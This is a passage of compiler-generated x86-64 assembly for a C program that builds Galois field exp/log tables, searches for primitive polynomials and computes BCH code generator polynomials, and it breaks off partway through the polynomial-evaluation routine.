.p2align 4, 0x90
_main: ## @main
.cfi_startproc
## %bb.0:
pushq %rbp
.cfi_def_cfa_offset 16
.cfi_offset %rbp, -16
movq %rsp, %rbp
.cfi_def_cfa_register %rbp
subq $48, %rsp
movl $0, -4(%rbp)
movl %edi, -8(%rbp)
movq %rsi, -16(%rbp)
movl $0, -28(%rbp)
cmpl $3, -8(%rbp)
jge LBB0_2
## %bb.1:
movq -16(%rbp), %rax
movq (%rax), %rdi
callq _usage
movl $1, -4(%rbp)
jmp LBB0_22
LBB0_2:
movq -16(%rbp), %rax
movq 8(%rax), %rdi
leaq L_.str(%rip), %rsi
callq _strcasecmp
cmpl $0, %eax
jne LBB0_4
## %bb.3:
movq -16(%rbp), %rax
movq 16(%rax), %rdi
callq _atoi
movl %eax, %edi
callq _poly_search
movl %eax, -4(%rbp)
jmp LBB0_22
LBB0_4:
movq -16(%rbp), %rax
movq 8(%rax), %rdi
leaq -24(%rbp), %rsi
callq _parse_poly
cmpl $0, %eax
jge LBB0_6
## %bb.5:
movl $-1, -4(%rbp)
jmp LBB0_22
LBB0_6:
movq -24(%rbp), %rdi
callq _gf_init
cmpl $0, %eax
jge LBB0_8
## %bb.7:
movl $-1, -4(%rbp)
jmp LBB0_22
LBB0_8:
movq -16(%rbp), %rax
movq 16(%rax), %rdi
leaq L_.str.1(%rip), %rsi
callq _strcasecmp
cmpl $0, %eax
jne LBB0_10
## %bb.9:
movq _gf_exp(%rip), %rdi
callq _gf_dump
jmp LBB0_21
LBB0_10:
movq -16(%rbp), %rax
movq 16(%rax), %rdi
leaq L_.str.2(%rip), %rsi
callq _strcasecmp
cmpl $0, %eax
jne LBB0_12
## %bb.11:
movq _gf_log(%rip), %rdi
callq _gf_dump
jmp LBB0_20
LBB0_12:
movq -16(%rbp), %rax
movq 16(%rax), %rdi
leaq L_.str.3(%rip), %rsi
callq _strcasecmp
cmpl $0, %eax
jne LBB0_18
## %bb.13:
cmpl $4, -8(%rbp)
jge LBB0_15
## %bb.14:
movq -16(%rbp), %rax
movq (%rax), %rdi
callq _usage
movl $1, -4(%rbp)
jmp LBB0_22
LBB0_15:
movq -16(%rbp), %rax
movq 24(%rax), %rdi
callq _atoi
## kill: def $ax killed $ax killed $eax
leaq -40(%rbp), %rsi
movzwl %ax, %edi
callq _bch_generator
cmpl $0, %eax
jge LBB0_17
## %bb.16:
movl $-1, -28(%rbp)
LBB0_17:
jmp LBB0_19
LBB0_18:
movq ___stderrp@GOTPCREL(%rip), %rax
movq (%rax), %rdi
movq -16(%rbp), %rax
movq 16(%rax), %rdx
leaq L_.str.4(%rip), %rsi
movb $0, %al
callq _fprintf
movl $-1, -28(%rbp)
LBB0_19:
jmp LBB0_20
LBB0_20:
jmp LBB0_21
LBB0_21:
callq _gf_exit
movl -28(%rbp), %eax
movl %eax, -4(%rbp)
LBB0_22:
movl -4(%rbp), %eax
addq $48, %rsp
popq %rbp
retq
.cfi_endproc
## -- End function
.p2align 4, 0x90 ## -- Begin function usage
_usage: ## @usage
.cfi_startproc
## %bb.0:
pushq %rbp
.cfi_def_cfa_offset 16
.cfi_offset %rbp, -16
movq %rsp, %rbp
.cfi_def_cfa_register %rbp
subq $16, %rsp
movq %rdi, -8(%rbp)
movq -8(%rbp), %rsi
movq -8(%rbp), %rdx
movq -8(%rbp), %rcx
movq -8(%rbp), %r8
leaq L_.str.5(%rip), %rdi
movb $0, %al
callq _printf
addq $16, %rsp
popq %rbp
retq
.cfi_endproc
## -- End function
.p2align 4, 0x90 ## -- Begin function poly_search
_poly_search: ## @poly_search
.cfi_startproc
## %bb.0:
pushq %rbp
.cfi_def_cfa_offset 16
.cfi_offset %rbp, -16
movq %rsp, %rbp
.cfi_def_cfa_register %rbp
subq $16, %rsp
movl %edi, -4(%rbp)
movl -4(%rbp), %ecx
movl $1, %eax
## kill: def $cl killed $ecx
shll %cl, %eax
cltq
movq %rax, -16(%rbp)
LBB2_1: ## =>This Inner Loop Header: Depth=1
movq -16(%rbp), %rax
movl -4(%rbp), %ecx
## kill: def $rcx killed $ecx
## kill: def $cl killed $rcx
shrq %cl, %rax
cmpq $1, %rax
ja LBB2_6
## %bb.2: ## in Loop: Header=BB2_1 Depth=1
movq -16(%rbp), %rdi
callq _is_primitive
cmpl $0, %eax
je LBB2_4
## %bb.3: ## in Loop: Header=BB2_1 Depth=1
movq -16(%rbp), %rsi
movl $120, %edi
callq _print_poly
leaq L_.str.6(%rip), %rdi
movb $0, %al
callq _printf
LBB2_4: ## in Loop: Header=BB2_1 Depth=1
jmp LBB2_5
LBB2_5: ## in Loop: Header=BB2_1 Depth=1
movq -16(%rbp), %rax
addq $1, %rax
movq %rax, -16(%rbp)
jmp LBB2_1
LBB2_6:
xorl %eax, %eax
addq $16, %rsp
popq %rbp
retq
.cfi_endproc
## -- End function
.p2align 4, 0x90 ## -- Begin function parse_poly
_parse_poly: ## @parse_poly
.cfi_startproc
## %bb.0:
pushq %rbp
.cfi_def_cfa_offset 16
.cfi_offset %rbp, -16
movq %rsp, %rbp
.cfi_def_cfa_register %rbp
subq $48, %rsp
movq %rdi, -16(%rbp)
movq %rsi, -24(%rbp)
movq $0, -32(%rbp)
LBB3_1: ## =>This Inner Loop Header: Depth=1
movq -16(%rbp), %rax
movsbl (%rax), %ecx
movb $1, %al
cmpl $48, %ecx
movb %al, -34(%rbp) ## 1-byte Spill
je LBB3_3
## %bb.2: ## in Loop: Header=BB3_1 Depth=1
movq -16(%rbp), %rax
movsbl (%rax), %eax
cmpl $120, %eax
sete %al
movb %al, -34(%rbp) ## 1-byte Spill
LBB3_3: ## in Loop: Header=BB3_1 Depth=1
movb -34(%rbp), %al ## 1-byte Reload
testb $1, %al
jne LBB3_4
jmp LBB3_5
LBB3_4: ## in Loop: Header=BB3_1 Depth=1
movq -16(%rbp), %rax
addq $1, %rax
movq %rax, -16(%rbp)
jmp LBB3_1
LBB3_5:
jmp LBB3_6
LBB3_6: ## =>This Inner Loop Header: Depth=1
movq -16(%rbp), %rax
cmpb $0, (%rax)
je LBB3_20
## %bb.7: ## in Loop: Header=BB3_6 Depth=1
movq -16(%rbp), %rax
movq %rax, %rcx
addq $1, %rcx
movq %rcx, -16(%rbp)
movb (%rax), %al
movb %al, -33(%rbp)
movq -32(%rbp), %rax
shlq $4, %rax
movq %rax, -32(%rbp)
movsbl -33(%rbp), %eax
cmpl $48, %eax
jl LBB3_10
## %bb.8: ## in Loop: Header=BB3_6 Depth=1
movsbl -33(%rbp), %eax
cmpl $57, %eax
jg LBB3_10
## %bb.9: ## in Loop: Header=BB3_6 Depth=1
movsbl -33(%rbp), %eax
subl $48, %eax
cltq
orq -32(%rbp), %rax
movq %rax, -32(%rbp)
jmp LBB3_19
LBB3_10: ## in Loop: Header=BB3_6 Depth=1
movsbl -33(%rbp), %eax
cmpl $65, %eax
jl LBB3_13
## %bb.11: ## in Loop: Header=BB3_6 Depth=1
movsbl -33(%rbp), %eax
cmpl $70, %eax
jg LBB3_13
## %bb.12: ## in Loop: Header=BB3_6 Depth=1
movsbl -33(%rbp), %eax
subl $65, %eax
addl $10, %eax
cltq
orq -32(%rbp), %rax
movq %rax, -32(%rbp)
jmp LBB3_18
LBB3_13: ## in Loop: Header=BB3_6 Depth=1
movsbl -33(%rbp), %eax
cmpl $97, %eax
jl LBB3_16
## %bb.14: ## in Loop: Header=BB3_6 Depth=1
movsbl -33(%rbp), %eax
cmpl $102, %eax
jg LBB3_16
## %bb.15: ## in Loop: Header=BB3_6 Depth=1
movsbl -33(%rbp), %eax
subl $97, %eax
addl $10, %eax
cltq
orq -32(%rbp), %rax
movq %rax, -32(%rbp)
jmp LBB3_17
LBB3_16:
movq ___stderrp@GOTPCREL(%rip), %rax
movq (%rax), %rdi
movq -16(%rbp), %rdx
leaq L_.str.12(%rip), %rsi
movb $0, %al
callq _fprintf
movl $-1, -4(%rbp)
jmp LBB3_21
LBB3_17: ## in Loop: Header=BB3_6 Depth=1
jmp LBB3_18
LBB3_18: ## in Loop: Header=BB3_6 Depth=1
jmp LBB3_19
LBB3_19: ## in Loop: Header=BB3_6 Depth=1
jmp LBB3_6
LBB3_20:
movq -32(%rbp), %rcx
movq -24(%rbp), %rax
movq %rcx, (%rax)
movl $0, -4(%rbp)
LBB3_21:
movl -4(%rbp), %eax
addq $48, %rsp
popq %rbp
retq
.cfi_endproc
## -- End function
.p2align 4, 0x90 ## -- Begin function gf_init
_gf_init: ## @gf_init
.cfi_startproc
## %bb.0:
pushq %rbp
.cfi_def_cfa_offset 16
.cfi_offset %rbp, -16
movq %rsp, %rbp
.cfi_def_cfa_register %rbp
subq $48, %rsp
movq %rdi, -16(%rbp)
movq -16(%rbp), %rdi
callq _degree
movl %eax, -20(%rbp)
movl -20(%rbp), %ecx
movl $1, %eax
## kill: def $cl killed $ecx
shll %cl, %eax
movl %eax, -24(%rbp)
movq $1, -32(%rbp)
movslq -20(%rbp), %rax
cmpq $16, %rax
jbe LBB4_2
## %bb.1:
movq ___stderrp@GOTPCREL(%rip), %rax
movq (%rax), %rdi
leaq L_.str.13(%rip), %rsi
movb $0, %al
callq _fprintf
movl $-1, -4(%rbp)
jmp LBB4_11
LBB4_2:
movl -24(%rbp), %eax
subl $1, %eax
## kill: def $ax killed $ax killed $eax
movw %ax, _gf_order(%rip)
movl -20(%rbp), %eax
## kill: def $ax killed $ax killed $eax
movw %ax, _gf_degree(%rip)
movl -24(%rbp), %eax
shll $1, %eax
movslq %eax, %rdi
shlq $1, %rdi
callq _malloc
movq %rax, _gf_exp(%rip)
cmpq $0, _gf_exp(%rip)
jne LBB4_4
## %bb.3:
leaq L_.str.14(%rip), %rdi
callq _perror
movl $-1, -4(%rbp)
jmp LBB4_11
LBB4_4:
movq _gf_exp(%rip), %rax
movslq -24(%rbp), %rcx
shlq $1, %rcx
addq %rcx, %rax
movq %rax, _gf_log(%rip)
movl $0, -36(%rbp)
LBB4_5: ## =>This Inner Loop Header: Depth=1
movl -36(%rbp), %eax
cmpl -24(%rbp), %eax
jge LBB4_10
## %bb.6: ## in Loop: Header=BB4_5 Depth=1
movq -32(%rbp), %rax
movw %ax, %dx
movq _gf_exp(%rip), %rax
movslq -36(%rbp), %rcx
movw %dx, (%rax,%rcx,2)
movl -36(%rbp), %eax
movw %ax, %dx
movq _gf_log(%rip), %rax
movq -32(%rbp), %rcx
movw %dx, (%rax,%rcx,2)
movq -32(%rbp), %rax
shlq $1, %rax
movq %rax, -32(%rbp)
movq -32(%rbp), %rax
movl -20(%rbp), %ecx
## kill: def $rcx killed $ecx
## kill: def $cl killed $rcx
shrq %cl, %rax
cmpq $0, %rax
je LBB4_8
## %bb.7: ## in Loop: Header=BB4_5 Depth=1
movq -16(%rbp), %rax
xorq -32(%rbp), %rax
movq %rax, -32(%rbp)
LBB4_8: ## in Loop: Header=BB4_5 Depth=1
jmp LBB4_9
LBB4_9: ## in Loop: Header=BB4_5 Depth=1
movl -36(%rbp), %eax
addl $1, %eax
movl %eax, -36(%rbp)
jmp LBB4_5
LBB4_10:
movl $0, -4(%rbp)
LBB4_11:
movl -4(%rbp), %eax
addq $48, %rsp
popq %rbp
retq
.cfi_endproc
## -- End function
.p2align 4, 0x90 ## -- Begin function gf_dump
_gf_dump: ## @gf_dump
.cfi_startproc
## %bb.0:
pushq %rbp
.cfi_def_cfa_offset 16
.cfi_offset %rbp, -16
movq %rsp, %rbp
.cfi_def_cfa_register %rbp
subq $64, %rsp
movq ___stack_chk_guard@GOTPCREL(%rip), %rax
movq (%rax), %rax
movq %rax, -8(%rbp)
movq %rdi, -40(%rbp)
movzwl _gf_degree(%rip), %ecx
movl $1, %eax
## kill: def $cl killed $ecx
shll %cl, %eax
movl %eax, -44(%rbp)
movzwl _gf_degree(%rip), %eax
addl $3, %eax
sarl $2, %eax
movl %eax, -48(%rbp)
movl -48(%rbp), %ecx
addl $5, %ecx
movl $72, %eax
cltd
idivl %ecx
movl %eax, -52(%rbp)
leaq -32(%rbp), %rdi
movl -48(%rbp), %r9d
movl $16, %ecx
xorl %edx, %edx
leaq L_.str.15(%rip), %r8
movq %rcx, %rsi
movb $0, %al
callq ___snprintf_chk
movl $0, -56(%rbp)
LBB5_1: ## =>This Inner Loop Header: Depth=1
movl -56(%rbp), %eax
cmpl -44(%rbp), %eax
jge LBB5_8
## %bb.2: ## in Loop: Header=BB5_1 Depth=1
movl -56(%rbp), %eax
cltd
idivl -52(%rbp)
cmpl $0, %edx
je LBB5_4
## %bb.3: ## in Loop: Header=BB5_1 Depth=1
leaq L_.str.16(%rip), %rdi
movb $0, %al
callq _printf
LBB5_4: ## in Loop: Header=BB5_1 Depth=1
leaq -32(%rbp), %rdi
movq -40(%rbp), %rax
movslq -56(%rbp), %rcx
movzwl (%rax,%rcx,2), %esi
movb $0, %al
callq _printf
movl -56(%rbp), %eax
addl $1, %eax
cltd
idivl -52(%rbp)
cmpl $0, %edx
jne LBB5_6
## %bb.5: ## in Loop: Header=BB5_1 Depth=1
leaq L_.str.6(%rip), %rdi
movb $0, %al
callq _printf
LBB5_6: ## in Loop: Header=BB5_1 Depth=1
jmp LBB5_7
LBB5_7: ## in Loop: Header=BB5_1 Depth=1
movl -56(%rbp), %eax
addl $1, %eax
movl %eax, -56(%rbp)
jmp LBB5_1
LBB5_8:
movl -56(%rbp), %eax
cltd
idivl -52(%rbp)
cmpl $0, %edx
je LBB5_10
## %bb.9:
leaq L_.str.6(%rip), %rdi
movb $0, %al
callq _printf
LBB5_10:
movq ___stack_chk_guard@GOTPCREL(%rip), %rax
movq (%rax), %rax
movq -8(%rbp), %rcx
cmpq %rcx, %rax
jne LBB5_12
## %bb.11:
addq $64, %rsp
popq %rbp
retq
LBB5_12:
callq ___stack_chk_fail
ud2
.cfi_endproc
## -- End function
.p2align 4, 0x90 ## -- Begin function bch_generator
_bch_generator: ## @bch_generator
.cfi_startproc
## %bb.0:
pushq %rbp
.cfi_def_cfa_offset 16
.cfi_offset %rbp, -16
movq %rsp, %rbp
.cfi_def_cfa_register %rbp
subq $64, %rsp
movw %di, %ax
movw %ax, -6(%rbp)
movq %rsi, -16(%rbp)
movzwl _gf_degree(%rip), %ecx
addl $1, %ecx
movl $1, %eax
## kill: def $cl killed $ecx
shll %cl, %eax
movslq %eax, %rdi
callq _bit_memsz
movq %rax, -24(%rbp)
movq $1, -40(%rbp)
movzwl -6(%rbp), %eax
movzwl _gf_order(%rip), %ecx
cmpl %ecx, %eax
jl LBB6_2
## %bb.1:
movq ___stderrp@GOTPCREL(%rip), %rax
movq (%rax), %rdi
leaq L_.str.17(%rip), %rsi
movb $0, %al
callq _fprintf
movl $-1, -4(%rbp)
jmp LBB6_16
LBB6_2:
movq -24(%rbp), %rdi
callq _malloc
movq %rax, -32(%rbp)
cmpq $0, -32(%rbp)
jne LBB6_4
## %bb.3:
leaq L_.str.18(%rip), %rdi
callq _perror
movl $-1, -4(%rbp)
jmp LBB6_16
LBB6_4:
movq -32(%rbp), %rdi
movq -24(%rbp), %rdx
xorl %esi, %esi
movq $-1, %rcx
callq ___memset_chk
movzwl -6(%rbp), %esi
leaq L_.str.19(%rip), %rdi
movb $0, %al
callq _printf
movw $1, -42(%rbp)
LBB6_5: ## =>This Inner Loop Header: Depth=1
movzwl -42(%rbp), %eax
movzwl -6(%rbp), %ecx
cmpl %ecx, %eax
jg LBB6_13
## %bb.6: ## in Loop: Header=BB6_5 Depth=1
movq _gf_exp(%rip), %rax
movzwl -42(%rbp), %ecx
## kill: def $rcx killed $ecx
movzwl (%rax,%rcx,2), %edi
callq _minimal
movzwl %ax, %eax
## kill: def $rax killed $eax
movq %rax, -56(%rbp)
movzwl -42(%rbp), %esi
leaq L_.str.20(%rip), %rdi
movb $0, %al
callq _printf
movq -56(%rbp), %rsi
movl $120, %edi
callq _print_poly
movq -32(%rbp), %rdi
movq -56(%rbp), %rsi
callq _bit_test
cmpl $0, %eax
jne LBB6_10
## %bb.7: ## in Loop: Header=BB6_5 Depth=1
movq -56(%rbp), %rdi
callq _degree
movl %eax, -60(%rbp) ## 4-byte Spill
movq -40(%rbp), %rdi
callq _degree
movl %eax, %ecx
movl -60(%rbp), %eax ## 4-byte Reload
addl %ecx, %eax
cltq
cmpq $63, %rax
jbe LBB6_9
## %bb.8:
movq ___stderrp@GOTPCREL(%rip), %rax
movq (%rax), %rdi
leaq L_.str.21(%rip), %rsi
movb $0, %al
callq _fprintf
movl $-1, -4(%rbp)
jmp LBB6_16
LBB6_9: ## in Loop: Header=BB6_5 Depth=1
movq -40(%rbp), %rdi
movq -56(%rbp), %rsi
callq _mul_poly
movq %rax, -40(%rbp)
movq -32(%rbp), %rdi
movq -56(%rbp), %rsi
callq _bit_set
leaq L_.str.6(%rip), %rdi
movb $0, %al
callq _printf
jmp LBB6_11
LBB6_10: ## in Loop: Header=BB6_5 Depth=1
leaq L_.str.22(%rip), %rdi
movb $0, %al
callq _printf
LBB6_11: ## in Loop: Header=BB6_5 Depth=1
jmp LBB6_12
LBB6_12: ## in Loop: Header=BB6_5 Depth=1
movzwl -42(%rbp), %eax
addl $2, %eax
## kill: def $ax killed $ax killed $eax
movw %ax, -42(%rbp)
jmp LBB6_5
LBB6_13:
leaq L_.str.23(%rip), %rdi
movb $0, %al
callq _printf
movq -40(%rbp), %rsi
movl $120, %edi
callq _print_poly
leaq L_.str.6(%rip), %rdi
movb $0, %al
callq _printf
cmpq $0, -16(%rbp)
je LBB6_15
## %bb.14:
movq -40(%rbp), %rcx
movq -16(%rbp), %rax
movq %rcx, (%rax)
LBB6_15:
movq -32(%rbp), %rdi
callq _free
movl $0, -4(%rbp)
LBB6_16:
movl -4(%rbp), %eax
addq $64, %rsp
popq %rbp
retq
.cfi_endproc
## -- End function
.p2align 4, 0x90 ## -- Begin function gf_exit
_gf_exit: ## @gf_exit
.cfi_startproc
## %bb.0:
pushq %rbp
.cfi_def_cfa_offset 16
.cfi_offset %rbp, -16
movq %rsp, %rbp
.cfi_def_cfa_register %rbp
movq _gf_exp(%rip), %rdi
callq _free
popq %rbp
retq
.cfi_endproc
## -- End function
.p2align 4, 0x90 ## -- Begin function is_primitive
_is_primitive: ## @is_primitive
.cfi_startproc
## %bb.0:
pushq %rbp
.cfi_def_cfa_offset 16
.cfi_offset %rbp, -16
movq %rsp, %rbp
.cfi_def_cfa_register %rbp
subq $48, %rsp
movq %rdi, -8(%rbp)
movq -8(%rbp), %rdi
callq _degree
movl %eax, -12(%rbp)
movl -12(%rbp), %ecx
movl $1, %eax
## kill: def $cl killed $ecx
shll %cl, %eax
subl $1, %eax
movl %eax, -16(%rbp)
movq $1, -24(%rbp)
movl $0, -36(%rbp)
LBB8_1: ## =>This Inner Loop Header: Depth=1
movl -36(%rbp), %eax
cmpl -16(%rbp), %eax
jge LBB8_6
## %bb.2: ## in Loop: Header=BB8_1 Depth=1
movq -24(%rbp), %rax
shlq $1, %rax
movq %rax, -24(%rbp)
movq -24(%rbp), %rax
movl -12(%rbp), %ecx
## kill: def $rcx killed $ecx
## kill: def $cl killed $rcx
shrq %cl, %rax
cmpq $0, %rax
je LBB8_4
## %bb.3: ## in Loop: Header=BB8_1 Depth=1
movq -8(%rbp), %rax
xorq -24(%rbp), %rax
movq %rax, -24(%rbp)
LBB8_4: ## in Loop: Header=BB8_1 Depth=1
jmp LBB8_5
LBB8_5: ## in Loop: Header=BB8_1 Depth=1
movl -36(%rbp), %eax
addl $1, %eax
movl %eax, -36(%rbp)
jmp LBB8_1
LBB8_6:
movq -24(%rbp), %rax
movq %rax, -32(%rbp)
movl $0, -36(%rbp)
LBB8_7: ## =>This Inner Loop Header: Depth=1
movq -24(%rbp), %rax
shlq $1, %rax
movq %rax, -24(%rbp)
movq -24(%rbp), %rax
movl -12(%rbp), %ecx
## kill: def $rcx killed $ecx
## kill: def $cl killed $rcx
shrq %cl, %rax
cmpq $0, %rax
je LBB8_9
## %bb.8: ## in Loop: Header=BB8_7 Depth=1
movq -8(%rbp), %rax
xorq -24(%rbp), %rax
movq %rax, -24(%rbp)
LBB8_9: ## in Loop: Header=BB8_7 Depth=1
movl -36(%rbp), %eax
addl $1, %eax
movl %eax, -36(%rbp)
## %bb.10: ## in Loop: Header=BB8_7 Depth=1
movq -24(%rbp), %rax
cmpq -32(%rbp), %rax
jne LBB8_7
## %bb.11:
movl -36(%rbp), %eax
cmpl -16(%rbp), %eax
sete %al
andb $1, %al
movzbl %al, %eax
addq $48, %rsp
popq %rbp
retq
.cfi_endproc
## -- End function
.p2align 4, 0x90 ## -- Begin function print_poly
_print_poly: ## @print_poly
.cfi_startproc
## %bb.0:
pushq %rbp
.cfi_def_cfa_offset 16
.cfi_offset %rbp, -16
movq %rsp, %rbp
.cfi_def_cfa_register %rbp
subq $32, %rsp
movb %dil, %al
movb %al, -1(%rbp)
movq %rsi, -16(%rbp)
movl $0, -20(%rbp)
movq -16(%rbp), %rax
movq %rax, -32(%rbp) ## 8-byte Spill
movq -16(%rbp), %rdi
callq _reciprocal
movq -32(%rbp), %rsi ## 8-byte Reload
movq %rax, %rdx
leaq L_.str.7(%rip), %rdi
movb $0, %al
callq _printf
movl $63, -24(%rbp)
LBB9_1: ## =>This Inner Loop Header: Depth=1
cmpl $0, -24(%rbp)
jl LBB9_14
## %bb.2: ## in Loop: Header=BB9_1 Depth=1
movq -16(%rbp), %rax
movl -24(%rbp), %ecx
## kill: def $rcx killed $ecx
## kill: def $cl killed $rcx
shrq %cl, %rax
andq $1, %rax
cmpq $0, %rax
jne LBB9_4
## %bb.3: ## in Loop: Header=BB9_1 Depth=1
jmp LBB9_13
LBB9_4: ## in Loop: Header=BB9_1 Depth=1
cmpl $0, -20(%rbp)
je LBB9_6
## %bb.5: ## in Loop: Header=BB9_1 Depth=1
leaq L_.str.8(%rip), %rdi
movb $0, %al
callq _printf
LBB9_6: ## in Loop: Header=BB9_1 Depth=1
cmpl $0, -24(%rbp)
jne LBB9_8
## %bb.7: ## in Loop: Header=BB9_1 Depth=1
leaq L_.str.9(%rip), %rdi
movb $0, %al
callq _printf
jmp LBB9_12
LBB9_8: ## in Loop: Header=BB9_1 Depth=1
cmpl $1, -24(%rbp)
jne LBB9_10
## %bb.9: ## in Loop: Header=BB9_1 Depth=1
movsbl -1(%rbp), %esi
leaq L_.str.10(%rip), %rdi
movb $0, %al
callq _printf
jmp LBB9_11
LBB9_10: ## in Loop: Header=BB9_1 Depth=1
movsbl -1(%rbp), %esi
movl -24(%rbp), %edx
leaq L_.str.11(%rip), %rdi
movb $0, %al
callq _printf
LBB9_11: ## in Loop: Header=BB9_1 Depth=1
jmp LBB9_12
LBB9_12: ## in Loop: Header=BB9_1 Depth=1
movl $1, -20(%rbp)
LBB9_13: ## in Loop: Header=BB9_1 Depth=1
movl -24(%rbp), %eax
addl $-1, %eax
movl %eax, -24(%rbp)
jmp LBB9_1
LBB9_14:
addq $32, %rsp
popq %rbp
retq
.cfi_endproc
## -- End function
.p2align 4, 0x90 ## -- Begin function degree
_degree: ## @degree
.cfi_startproc
## %bb.0:
pushq %rbp
.cfi_def_cfa_offset 16
.cfi_offset %rbp, -16
movq %rsp, %rbp
.cfi_def_cfa_register %rbp
movq %rdi, -8(%rbp)
movl $0, -12(%rbp)
LBB10_1: ## =>This Inner Loop Header: Depth=1
cmpq $1, -8(%rbp)
jbe LBB10_3
## %bb.2: ## in Loop: Header=BB10_1 Depth=1
movq -8(%rbp), %rax
shrq $1, %rax
movq %rax, -8(%rbp)
movl -12(%rbp), %eax
addl $1, %eax
movl %eax, -12(%rbp)
jmp LBB10_1
LBB10_3:
movl -12(%rbp), %eax
popq %rbp
retq
.cfi_endproc
## -- End function
.p2align 4, 0x90 ## -- Begin function reciprocal
_reciprocal: ## @reciprocal
.cfi_startproc
## %bb.0:
pushq %rbp
.cfi_def_cfa_offset 16
.cfi_offset %rbp, -16
movq %rsp, %rbp
.cfi_def_cfa_register %rbp
movq %rdi, -8(%rbp)
movq $0, -16(%rbp)
LBB11_1: ## =>This Inner Loop Header: Depth=1
cmpq $0, -8(%rbp)
je LBB11_3
## %bb.2: ## in Loop: Header=BB11_1 Depth=1
movq -16(%rbp), %rax
shlq $1, %rax
movq %rax, -16(%rbp)
movq -8(%rbp), %rax
andq $1, %rax
orq -16(%rbp), %rax
movq %rax, -16(%rbp)
movq -8(%rbp), %rax
shrq $1, %rax
movq %rax, -8(%rbp)
jmp LBB11_1
LBB11_3:
movq -16(%rbp), %rax
popq %rbp
retq
.cfi_endproc
## -- End function
.p2align 4, 0x90 ## -- Begin function bit_memsz
_bit_memsz: ## @bit_memsz
.cfi_startproc
## %bb.0:
pushq %rbp
.cfi_def_cfa_offset 16
.cfi_offset %rbp, -16
movq %rsp, %rbp
.cfi_def_cfa_register %rbp
movq %rdi, -8(%rbp)
movq -8(%rbp), %rax
addq $7, %rax
shrq $3, %rax
popq %rbp
retq
.cfi_endproc
## -- End function
.p2align 4, 0x90 ## -- Begin function minimal
_minimal: ## @minimal
.cfi_startproc
## %bb.0:
pushq %rbp
.cfi_def_cfa_offset 16
.cfi_offset %rbp, -16
movq %rsp, %rbp
.cfi_def_cfa_register %rbp
subq $16, %rsp
movw %di, %ax
movw %ax, -2(%rbp)
movq $1, -16(%rbp)
LBB13_1: ## =>This Inner Loop Header: Depth=1
movq -16(%rbp), %rax
movzwl _gf_degree(%rip), %ecx
movl %ecx, %ecx
## kill: def $rcx killed $ecx
## kill: def $cl killed $rcx
shrq %cl, %rax
cmpq $1, %rax
ja LBB13_6
## %bb.2: ## in Loop: Header=BB13_1 Depth=1
movq -16(%rbp), %rdi
movzwl -2(%rbp), %esi
callq _eval_poly
cmpw $0, %ax
jne LBB13_4
## %bb.3:
jmp LBB13_6
LBB13_4: ## in Loop: Header=BB13_1 Depth=1
jmp LBB13_5
LBB13_5: ## in Loop: Header=BB13_1 Depth=1
movq -16(%rbp), %rax
addq $1, %rax
movq %rax, -16(%rbp)
jmp LBB13_1
LBB13_6:
movq -16(%rbp), %rax
## kill: def $ax killed $ax killed $rax
movzwl %ax, %eax
addq $16, %rsp
popq %rbp
retq
.cfi_endproc
## -- End function
.p2align 4, 0x90 ## -- Begin function bit_test
_bit_test: ## @bit_test
.cfi_startproc
## %bb.0:
pushq %rbp
.cfi_def_cfa_offset 16
.cfi_offset %rbp, -16
movq %rsp, %rbp
.cfi_def_cfa_register %rbp
movq %rdi, -8(%rbp)
movq %rsi, -16(%rbp)
movq -16(%rbp), %rax
andq $7, %rax
movl %eax, %ecx
movl $1, %eax
## kill: def $cl killed $ecx
shll %cl, %eax
## kill: def $al killed $al killed $eax
movb %al, -17(%rbp)
movq -16(%rbp), %rax
shrq $3, %rax
movq %rax, -32(%rbp)
movq -8(%rbp), %rax
movq -32(%rbp), %rcx
movzbl (%rax,%rcx), %eax
movzbl -17(%rbp), %ecx
andl %ecx, %eax
popq %rbp
retq
.cfi_endproc
## -- End function
.p2align 4, 0x90 ## -- Begin function mul_poly
_mul_poly: ## @mul_poly
.cfi_startproc
## %bb.0:
pushq %rbp
.cfi_def_cfa_offset 16
.cfi_offset %rbp, -16
movq %rsp, %rbp
.cfi_def_cfa_register %rbp
movq %rdi, -8(%rbp)
movq %rsi, -16(%rbp)
movq $0, -24(%rbp)
LBB15_1: ## =>This Inner Loop Header: Depth=1
cmpq $0, -8(%rbp)
je LBB15_5
## %bb.2: ## in Loop: Header=BB15_1 Depth=1
movq -8(%rbp), %rax
andq $1, %rax
cmpq $0, %rax
je LBB15_4
## %bb.3: ## in Loop: Header=BB15_1 Depth=1
movq -16(%rbp), %rax
xorq -24(%rbp), %rax
movq %rax, -24(%rbp)
LBB15_4: ## in Loop: Header=BB15_1 Depth=1
movq -8(%rbp), %rax
shrq $1, %rax
movq %rax, -8(%rbp)
movq -16(%rbp), %rax
shlq $1, %rax
movq %rax, -16(%rbp)
jmp LBB15_1
LBB15_5:
movq -24(%rbp), %rax
popq %rbp
retq
.cfi_endproc
## -- End function
.p2align 4, 0x90 ## -- Begin function bit_set
_bit_set: ## @bit_set
.cfi_startproc
## %bb.0:
pushq %rbp
.cfi_def_cfa_offset 16
.cfi_offset %rbp, -16
movq %rsp, %rbp
.cfi_def_cfa_register %rbp
movq %rdi, -8(%rbp)
movq %rsi, -16(%rbp)
movq -16(%rbp), %rax
andq $7, %rax
movl %eax, %ecx
movl $1, %eax
## kill: def $cl killed $ecx
shll %cl, %eax
## kill: def $al killed $al killed $eax
movb %al, -17(%rbp)
movq -16(%rbp), %rax
shrq $3, %rax
movq %rax, -32(%rbp)
movzbl -17(%rbp), %esi
movq -8(%rbp), %rax
movq -32(%rbp), %rcx
movzbl (%rax,%rcx), %edx
orl %esi, %edx
## kill: def $dl killed $dl killed $edx
movb %dl, (%rax,%rcx)
popq %rbp
retq
.cfi_endproc
## -- End function
.p2align 4, 0x90 ## -- Begin function eval_poly
_eval_poly: ## @eval_poly
.cfi_startproc
## %bb.0:
pushq %rbp
.cfi_def_cfa_offset 16
.cfi_offset %rbp, -16
movq %rsp, %rbp
.cfi_def_cfa_register %rbp
subq $16, %rsp
movw %si, %ax
movq %rdi, -8(%rbp)
movw %ax, -10(%rbp)
movq _gf_log(%rip), %rax
movzwl -10(%rbp), %ecx
## kill: def $rcx killed $ecx
movw (%rax,%rcx,2), %ax
movw %ax, -12(%rbp)
movw $0, -14(%rbp)
movw $1, -16(%rbp)
movq -8(%rbp), %rdi
callq _reciprocal
movq %rax, -8(%rbp)
LBB17_1: ## =>This Inner Loop Header: Depth=1
cmpq $0, -8(%rbp)
je LBB17_5
## %bb.2: ## in Loop: Header=BB17_1 Depth=1
movq -8(%rbp), %rax
andq $1, %rax
cmpq $0, %rax
je LBB17_4
